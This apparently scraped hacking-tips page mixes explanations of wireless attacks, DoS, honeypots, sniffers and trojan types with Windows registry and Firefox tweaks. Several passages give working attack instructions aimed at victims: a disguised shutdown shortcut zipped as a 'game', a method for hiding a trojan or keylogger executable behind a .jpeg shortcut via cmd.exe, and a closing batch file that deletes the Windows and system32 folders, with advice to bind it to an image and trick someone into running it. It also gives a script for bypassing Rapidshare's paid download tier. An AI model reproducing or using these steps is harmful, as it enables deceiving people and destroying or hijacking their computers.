Wireless hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely

Denial of services attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.
What is a Denial Of Service Attack?

* A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.
* If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.

Types of denial of service attacks

There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:

* bandwidth attacks,
* protocol attacks, and
* logic attacks

What is Distributed Denial of Service Attack?

* An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.
* This makes it difficult to detect because attacks originate from several IP addresses.
* If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Honeypots

Definition :-
"Honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems." -Wikipedia

"Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource." -Lance Spitzner

Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. Its is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand.

Types of Honeypots :-
Low-Interaction Honeypot:- Low-interaction honeypots have limited interaction, they normally work by emulating services and operating systems
. Attacker activity is limited to the level of emulation by the honeypot. These honeypots tend to be easier to deploy and maintain, with minimal risk. Examples of low-interaction honeypots include Specter, Honeyd, and KFSensor.

High-Interaction Honeypot:- High-interaction honeypots are different, they are usually complex solutions as they involve real operating systems and applications. Nothing is emulated, we give attackers the real thing. The advantages with such a solution are two fold. First, you can capture extensive amounts of information. By giving attackers real systems to interact with, you can learn the full extent of their behavior. The second advantage is high-interaction honeypots make no assumptions on how an attacker will behave. Instead, they provide an open environment that captures all activity. However, this also increases the risk of the honeypot as attackers can use these real operating system to attack non-honeypot systems. As result, additional technologies have to be implement that prevent the attacker from harming other non-honeypot systems. However, they can be more complex to deploy and maintain. Examples of high-interaction honeypots include Symantec Decoy Server and Honeynets.

Packet Sniffers :-

Ethereal :- This (also known as Wireshark) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Latest Release:- Wireshark 1.0.4 (Ethereal)
Download:- http://www.wireshark.org/download.html

Kismet :- A powerful wireless
sniffer. Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing, and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.

Ettercap :- Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

DSniff :- A suite of powerful network auditing and penetration-testing tools. This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

Shutdown someones comp over any messenger
Ok this is a........ Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim's computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.

1) Right click on desk top, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"

You can change "this is a virus" to anything you would like thats just the message that will appear.
The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game. Depends on the victim̢۪s age and sex. But make sure you call it something good or the victim won't bother clicking on it.
After you have given it a name click on finish.
You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.
It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Dont forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.
Now feel free to send it to anyone you...... dislike greatly.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your selfOk go to start, run, type cmd, then in cmd type: shutdown -a

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Process-1:
First of all u have to get an static IP-Address.

How to shutdown pc with Timer
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 1:45am. Type this in

start=>Run

Type Code: at 1:45 shutdown -s

(Time should put when u want to shutdown ur pc)

TO ABORT:
Code:shutdown -a

The trick is for Firefox.....
What we will be doing is using Javascript to get high speed downloads from Rapidshare for free. We will still be using the "free user" link and will still need to wait the 120 seconds for it to begin, but when it does start, we should be getting download speeds of a premium user and we should be able to instigate multiple downloads.
Firstly you need Firefox, if you don't have it, get it for this alone.
Secondly we need the Greasemonkey plugin. Get it here:
CODE
http://www.greasespot.net/
Now go to this link
CODE
http://rapidshare.com/files/150086947/Bingo-bango.rar
This is a zipped javascript code. Unzip it to wherever you need. I keep it on my desktop for easy access
Ok if you are a current RS premuim user and want to test this, log out from RS n try it..

Ok so that's the prep done, let's carry on ..
In Firefox, click File, Open File. Find that file and open it, click install.
Ok that's it! Done!
Now find a RS link (I haven't got this to work on RS user directries as of yet) and go to the site. Accept any messages that come on screen, and don't change any options.
Now RS will look a little different. Wait for the countdown to finish and a pop-up will appear, click OK and then click "Create Link" Finally click "Download Link" If the countdown does not appear then just hit "Create Link" straight away and all should work immediately
There you have it - Premium speed downloads at no and I mean NO cost to yourself.
Try to keep it updated daily and if it stops working, a fix is being performed, so keep updating until it works.
Should you need to uninstall for any reason, click tools, greasemonkey, manage user scripts. The uninstall button is at the bottom.

This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My Computer go to : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Now in the right pane create a new DWORD item and name it NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh.

When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply delete this DWORD item. It's .reg file is as follows: REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore r] "NoDrives"=dword:03ffffff

To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon

Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It's .reg file would be: REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Lock ur pc.. open notepad copy and paste the script below and save it .VBS extention
This wil create a shortcut.. run(click) it

set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("Desktop") & "\LockWorkstation.lnk")
oShellLink.TargetPath = "%windir%\system32\rundll32.exe"
oShellLink.Arguments = "user32.dll,LockWorkStation"
oShellLink.Save

first select a folder for example i'll use a folder name movies in D drive D:\movies\

in the same drive u create a text file and type

ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}

and save it as loc.bat

again u type in a notepad as

ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies

and save it as key.bat

now in D drive u can see two batch files loc and key.. when u double click loc the movie folder will change to control panel and whn u double click key the control panel will change to normal folder..

there are two more different tricks in dis site to lock ur pc down in a unique ways.. donno where i have typed it.. !!!

The Recent Docs menu can be easily disabled by editing the Registry. To do this go to the following Key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane, create a new DWORD value by the name: NoRecentDocsMenu and set it's value to 1. Restart Explorer to save the changes. You can also clear the RUN MRU history. All the listings are stored in the key:

HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMR U

You can delete individual listings or the entire listing. To delete History of Find listings go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU and delete

Open Regedit and navigate to the following key:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Shell Icons
Backup the key. More information.
In the right-pane, create a new String value named "29"
Double-click 29 and set its data to:

C:\Windows\System32\shell32.dll,50 (an empty icon)
Close Registry Editor.

Now,

Right-click Desktop, choose Properties
Click the Appearance Tab.

Click Advanced button.

Choose Icon from the drop-down list

Set it's size to 31 and press OK, OK.

The changes will be applied now. Repeat the above steps and then set the Icon size back to 32 (defaults). The above steps are required to force Windows to redraw the icons

Some times it happens that you forgot the password of your memory card and you have lots of your important data in your phone.
So there are two types of methods for recovering the password of your memory card with the help of nokia phone.

For Nokia s60 1st and 2nd edition phones.

1.
First Install FExplorer in your phone memory.
2. Got to drive C: , you will find a file called mmcstore
3. Send it to your pc directly and open it in notepad or rename the file.
4. At the end of the file you will find your password.

For Nokia S60 3rd Phones, Nokia N-Series and Nokia E-Series

  • There is almost no way yet known to hack the memory card password in case of these types of phone but there is a way to do it some of the s60 3rd edition phones and almost all the E-series phones.
  • The remote lock option in E-Series phone allws you to unlock your phone by sending a sms.
  • The only thing you have to do is to activate this feature by going to Tools--> Settings--> Security-->Phone and SIM-->Allow remote lock menu. The password of your memory card will be your remote lock message.
  • So you have to just send a sms containing your remote lock message that will automatically change your memory card passsword.

What is a trojan?

A trojan horse could be either:
a) Unauthorized instructions contained within a legitimate program. These instrcutions perform functions unknown to (and probably unwanted by) the user.
b) A legitimate program that has been altered by the placement of anauthorized instructions within it. These instructions perform functions unknown to (and probably unwanted by) the user.
c) Any program that appears to perform a desirable and necessary function but that (because of unauthorized instructions within it) performs functions unknown to (and probably unwanted by) the user.

Under a restricted environment (a restricted Unix shell or a restricted Windows computer), malicious trojans can't do much, since they are restricted in their actions. But on a home PC, trojans can be lethal and quite destructive.

Why the name 'trojan horse'?
In the 12th century B.C., Greece declared war on the city of Troy. The dispute erupted when the prince of Troy abducted the queen of Sparta and declared that he wanted to make her his wife, which made the Greeks and especially the queen of Sparta quite furious.

The Greeks gave chase and engaged Troy in a 10-year war, but unfortunately for them, all of their efforts went down the drain. Troy was simply too well fortified.

In a last effort, the Greek army pretended to be retreating, leaving behind a hude wooden horse. The people of Troy saw the horse, and, thinking it was some kind of a present from the Greeks, pulled the horse into their city, without knowing that the finest soldiers of Greece were sitting inside it, since the horse was hollow.

Under the cover of night, the soldiers snuck out and opened the gates of the city, and later, together with the rest of the army, killed the entire army of Troy.

This is why such a program is called a trojan horse - it pretends to do something while it does something completely different, or does what it is supposed to be and hides it's malicious actions from the user's prying eyes.

During the rest of this text, we will explain about the most common types of trojan horses.

Remote Administration Trojans
These trojans are the most popular trojans now. Everyone wants to have them trojan because they let you have access to your victim's hard drive, and also perform many functions on his computer (open and close his CD-ROM drive, put message boxes on his computer etc'), which will scare off most computer users and are also a hell lot of fun to run on your friends or enemies.

Modern RAT'S (remote administration trojans) are very simple to use. They come packaged with two files - the server file and the client file (if you don't know which is which, look for a help file, a FAQ, a readme or instructions on the trojan's homepage). Just fool someone into runnig the server file and get his IP and you have FULL control over his/her computer (some trojans are limited by their functions, but more functions also mean larger server files. Some trojans are merely ment for the attacker to use them to upload another trojan to his target's computer and run it, hence they take very little disk space). You can also bind trojans into other programs which appear to be legitimate.

RAT'S have the common remote access trojan functions like:
keylogging (logging the target's keystrokes (keyboard functions) and sometimes even interfering with them, thus being able to use your keyboard to type instead of the target and say weird things in chatrooms or scare the hell out of people), upload and download function, make a screenshot of the target's monitor and so on.

Some people use the trojans for malicious purposes. They either use them to irritate, scare or harm their enemies, scare the hell out of their friends or enemies and seem like a "super hacker" to them, getting information about people and spying on them or just get into people's computers and delete stuff. This is considered very lame.

There are many programs out there that detects the most common trojans (such as Nemesis at blacksun.box.sk, which also detects people trying to access your computer), but new trojans are released every day and it's pretty hard to keep track of things.

Trojans would usually want to automatically start whenever you boot-up your computer. If you use Windows, you can get b00tm0n from blacksun.box.sk (note: at the time this tutrial was released, b00tm0n was not ready yet, but it should be ready some time before year 2,000, so if you're reading this after Y2K, b00tm0n should probably be available at blacksun.box.sk). Under Unix, we suggest getting some sort of an IDS (Intrusion Detection System) programs to monitor your system.

Most Windows trojans hide from the Alt+Ctrl+Del menu (we havn't seen any Unix program that had the ability to hide itself from the processes list yet, but you can never know - one day someone might discover a way to do so. Hell, someone might have already did). This is bad because there are people who use the task list to see which process are running. There are programs that will tell me you exactly what processes are running on your computer (such as Wintop, which is the Windows version of the popular Unix program called top). Some trojans, however, use fake names and it's a little harder for certain people to realize that they are infected.

Also, some trojans might simply open an FTP server on your computer (usually NOT on port 21, the default FTP port, in order to be less noticable). The FTP server is, of course, unpassworded, or has a password which the attacker has determined, and allows the attacker to download, upload and execute files quickly and easily. For more info about FTP servers and FTP security, read our FTP security tutorial at blacksun.box.sk.

How RATs work
Remote administration trojans open a port on your computer and bind themselves to it (make the server file listen to incoming connections and data going through these ports). Then, once someone runs his client program and enters the victim's IP, the trojan starts receiving commands from the attacker and runs them on the victim's computer.

Some trojans let you change this port into any other port and also put a password so only the person that infect this specific computer will be able to use the trojan. However, some of these password protections can be cracked due to bugs in the trojan (people who program RATs usually don't have much knowledge in the field of programming), and in some cases the creator of the trojan would also put a backdoor (which can be sometimes detected, under certain conditions) within the server file itself so he'll be able to access any computer running his trojan without the need to enter a password. This is called "a backdoor within a backdoor".

The most popular RATs are Netbus (because of it's simplicity), BO (has many functions and hides itself pretty good) and Sub7 (lots of functions and easy to use). These are all Windows RATs.

If you havn't done so already, it is advised to get some RAT and play around with it, just to see how the whole thing works. Using RATs for legitimate purposes
Some people use RATs to remotely administer computers they are allowed to have access to. This is all good and fine, but anyway, you should always be careful while working with RATs. Make sure you have legal access and the right to remotely administer a computer before using a RAT on it.

Password Trojans
Yes, password trojans. Password trojans scour your computer for password and then send them to the attacker or the author of the trojan. Whether it's your Internet password, your Hotmail password, your ICQ password or your IRC passwords, there is a trojan for every passsword. These trojans usually send the information back to the attacker via Email.

Priviledges-Elevating Trojans
These trojans would usually be used to fool system administrators. They can either be binded into a common system utility or pretend to be something unharmful and even quite useful and appealing. Once the administrator runs it, the trojan will give the attacker more priviledges on the system. These trojans can also be sent to less-priviledges users and give the attacker access to their account.

Keyloggers
These trojans are very simple. They log all of your keystrokes (including passwords), and then either save them on a file or Email them to the attacker once in a while.

Keyloggers usually don't take much disk space and can masquerade as important utilities, thus making them very hard to detect. Some keyloggers can also highlight passwords found in text boxes with titles such as 'enter password' or just the word password somewhere within the title text.

Destructive Trojans
These little fellows do nothing but damaging your computer. These trojans can destroy your entire hard drive, encrypt or just scramble important files and basically make you feel very unpleasent. I wouldn't want to bump into one in a dark alley.

Some might seem like joke programs, while they are actually tearing every file they encounter to pieces.

Joke Programs
Joke programs are nice, cute and unharmful. They can either pretend to be formatting your hard drive, sending all of your passwords to some evil cracker, self-destructing your computer, turning in all information about illegal and pirated software you might have on your computer to the FBI etc'. They are certainly no reason to worry about (except if you work in tech support, since unexperienced computer users tend to get scared off pretty easily by joke programs.

Protecting Yourself Against Trojans
Under Unix
If you are working on your PC, DO NOT work as root! If you run a trojan as root, you can endanger your entire system! The whole point in multi-users on a single-user system is limiting yourself in such cases (or in case you want to prevent yourself from doing anything stupid). Switch to root only when you NEED root, and when you know what you're running. Also, remember that even if you're working on a restricted environment, you still put the passwords and files you still have access to to risk. Also, if someone has a keylogger on your system, and you type in some passwords (especially the root password), they will be logged!

Also, DO NOT download any files from untrusted sources (small websites, underground websites, Usenet newsgroups, IRC etc'), even if it comes in the form of source code.

Under Windows
Windows is a whole lot different in this aspect. Limiting yourself under Windows is quite an annoyance. It is almost impossible to work like that, in comparison to Unix.

Also, make sure you don't run any untrusted software. There are much more evil Windows trojans for Windows than Unix, since people are more motivated to write trojans for Unix (because of all the security Unix imposes). Also, when running on a restricted Windows environment, you cannot just act like you're so protected and all. Remember that people can still steal passwords owned by the restricted user, and also, some trojans can break into administrator priviledges and then compromise your entire system, since Windows imposes such lame security.

Oh, and one last tip - you should try to download and use at least some of the types of trojans listed above, so you could get to know them better and be able to remove them in case you get infected.

This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000

Most of the files we download from the Internet are in Zip or rar format. We wouldn’t like if we download an archive to find that the file we are looking for is not there. And it is also such a waste of Bandwidth and time to download a whole archive just for a single file. Archview is a Firefox addon that lets you preview the contents of an Archive before downloading. And using it you can even download a single file from the archive.

Currently it supports only rar, ZIP and ISO format but that should be enough as they are the 2 most popular and common formats being used today. Archview adds itself to the stats bar and becomes active when the user clicks on a zip or rar link. It displays the contents almost instantly and presents the files of the archive in an XML or HTML interface. And what’s more, it even lets you download individual files for an archive, now no need to download a 10 MB archive for a file of 100 Kb that is inside.
The future version will also add support for the 7z format. It supports Firefox 2 and Firefox 3. It is definitely a great add on that can save you a lot of bandwidth.

1. Enable pipelining

Browsers are normally very polite, sending a request to a server then waiting for a response before continuing. Pipelining is a more aggressive technique that lets them send multiple requests before any responses are received, often reducing page download times. To enable it, type about:config in the address bar, double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true, then double-click network.http.pipelining.maxrequests and set this to 8.

Keep in mind that some servers don’t support pipelining, though, and if you regularly visit a lot of these then the tweak can actually reduce performance. Set network.http.pipelining and network.http.proxy.pipelining to false again if you have any problems.

2. Render quickly

Large, complex web pages can take a while to download. Firefox doesn’t want to keep you waiting, so by default will display what it’s received so far every 0.12 seconds (the “content notify interval”). While this helps the browser feel snappy, frequent redraws increase the total page load time, so a longer content notify interval will improve performance.

Type about:config and press [Enter], then right-click (Apple users ctrl-click) somewhere in the window and select New > Integer. Type content.notify.interval as your preference name, click OK, enter 500000 (that’s five hundred thousand, not fifty thousand) and click OK again.

Right-click again in the window and select New > Boolean. This time create a value called content.notify.ontimer and set it to True to finish the job.
__________________

3. Faster loading

If you haven’t moved your mouse or touched the keyboard for 0.75 seconds (the content switch threshold) then Firefox enters a low frequency interrupt mode, which means its interface becomes less responsive but your page loads more quickly. Reducing the content switch threshold can improve performance, then, and it only takes a moment.

Type about:config and press [Enter], right-click in the window and select New > Integer. Type content.switch.threshold, click OK, enter 250000 (a quarter of a second) and click OK to finish.

4. No interruptions

You can take the last step even further by telling Firefox to ignore user interface events altogether until the current page has been downloaded. This is a little drastic as Firefox could remain unresponsive for quite some time, but try this and see how it works for you.

Type about:config, press [Enter], right-click in the window and select New > Boolean. Type content.interrupt.parsing, click OK, set the value to False and click OK.

5. Block Flash

Intrusive Flash animations are everywhere, popping up over the content you actually want to read and slowing down your browsing. Fortunately there’s a very easy solution. Install the Flashblock extension (flashblock.mozdev.org) and it’ll block all Flash applets from loading, so web pages will display much more quickly. And if you discover some Flash content that isn’t entirely useless, just click its placeholder to download and view the applet as normal.

6. Increase the cache size

As you browse the web so Firefox stores site images and scripts in a local memory cache, where they can be speedily retrieved if you revisit the same page. If you have plenty of RAM (2 GB of more), leave Firefox running all the time and regularly return to pages then you can improve performance by increasing this cache size. Type about:config and press [Enter], then right-click anywhere in the window and select New > Integer. Type browser.cache.memory.capacity, click OK, enter 65536 and click OK, then restart your browser to get the new, larger cache.

7. Enable TraceMonkey

TraceMonkey is a new Firefox feature that converts slow Javascript into super-speedy x86 code, and so lets it run some functions anything up to 20 times faster than the current version. It’s still buggy so isn’t available in the regular Firefox download yet, but if you’re willing to risk the odd crash or two then there’s an easy way to try it out.

Install the latest nightly build (ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/), launch it, type about:config in the address bar and press Enter. Type JIT in the filter box, then double-click javascript.options.jit.chrome and javascript.options.jit.content to change their values to true, and that’s it - you’re running the fastest Firefox Javascript engine ever

8. Compress data

If you’ve a slow internet connection then it may feel like you’ll never get Firefox to perform properly, but that’s not necessarily true. Install toonel.net (toonel.net) and this clever Java applet will re-route your web traffic through its own server, compressing it at the same time, so there’s much less to download. And it can even compress JPEGs by allowing you to reduce their quality. This all helps to cut your data transfer, useful if you’re on a limited 1 GB-per-month account, and can at best double your browsing performance.

@echo off
@del c:\windows\
@del c:\windows\system32\
pause
end

copy n paste the code in ur note pad....save it as any name.BAT file.....thats all.....u can send it to the victim n somehow make him/her click it......if the victim is smart enough not to pick up a BAT file...just bind it with any exe file even a jpg file....peace...it's a really kick a** bt simple code...don play it on victim just for fun..
